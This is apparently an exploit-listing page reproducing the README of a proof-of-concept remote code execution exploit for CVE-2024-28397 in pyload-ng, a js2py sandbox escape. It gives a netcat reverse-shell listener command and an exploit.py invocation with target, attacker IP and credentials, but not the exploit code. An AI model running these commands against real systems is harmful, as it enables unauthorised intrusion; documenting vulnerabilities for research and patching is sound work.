Share
## https://sploitus.com/exploit?id=69428CB3-8F8F-589D-AC12-B2D689207103
# ๐Ÿšจ Remote Code Execution โ€“ CVE-2024-28397 (pyload-ng / js2py)

This repository contains a **Proof-of-Concept (PoC)** exploit for **CVE-2024-28397**, a Remote Code Execution vulnerability affecting **pyload-ng** due to insecure usage of **js2py**.  

> โš ๏ธ **Disclaimer:**  
> This PoC is for **educational and research purposes only**.  
> Do not use it on systems you do not own or have explicit permission to test.  
> The author is **not responsible** for any misuse of this code.

---

## ๐Ÿ› Vulnerability Details

- **CVE ID:** [CVE-2024-28397](https://nvd.nist.gov/vuln/detail/CVE-2024-28397)
- **Component:** `js2py` in `pyload-ng`
- **Impact:** Remote Code Execution (RCE)
- **Attack Vector:** Malicious JS payload escapes the js2py sandbox and executes arbitrary system commands.

---

## ๐Ÿ“ฆ Requirements & Setup

You will need **Python 3.x**, the `requests` library, and `netcat` for catching the reverse shell.  

- ๐Ÿ–ฅ๏ธ Target โ†’ Vulnerable pyload-ng instance with /run_code endpoint accessible

## ๐ŸŽง Listener โ†’ Start before running exploit:
**nc -lvnp 4444**

## ๐Ÿ–ฅ๏ธ Usage:
**python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123**

## ๐Ÿ“Œ Example Output:

- [+] Register successful!
- [+] Login successful
- [+] exploit worked